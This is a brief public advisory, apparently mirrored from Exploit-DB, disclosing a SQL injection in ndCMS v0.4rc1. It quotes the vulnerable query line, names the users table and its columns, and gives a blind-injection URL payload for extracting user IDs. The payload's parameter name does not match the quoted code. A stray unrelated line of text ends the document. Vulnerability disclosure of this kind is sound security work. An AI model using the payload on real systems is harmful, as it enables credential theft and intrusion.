''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moaub-27-ndcms-sql-injection-vulnerability/ ''' Abysssec Inc Public Advisory Title:ndCMS Sql Injection Vulnerability Affected Version :ndCMS(Nickel and Dime CMS) v0.4rc1 Discovery:www.abysssec.com Download Links :http://souurceforge.net/projects/ndcms-net Login Page :http://localhost/ndcms/admin/?Mode=Express&indx= Description : =========================================================================================== This version of ndCMS has Sql Injection Vulnerability that its DataBase is Access withTable of Users : tblUSERS Columns : userid , passwd. Vulnerable Code: .../express_edit/editor.aspx Ln 65: dbr = db.ExecuteReader("Select * from tblPAGES WHERE indx=" + Request.Params["indx"]); Considering to the code, for example you can browse this URL: http://Example.com/express_edit/editor.aspx?index=1+AND+1=IIF((select mid(last(userid),1,1) from (select top 1 userid from tblUSERS))='a',1,2) and so on. ===========================================================================================
体验盒子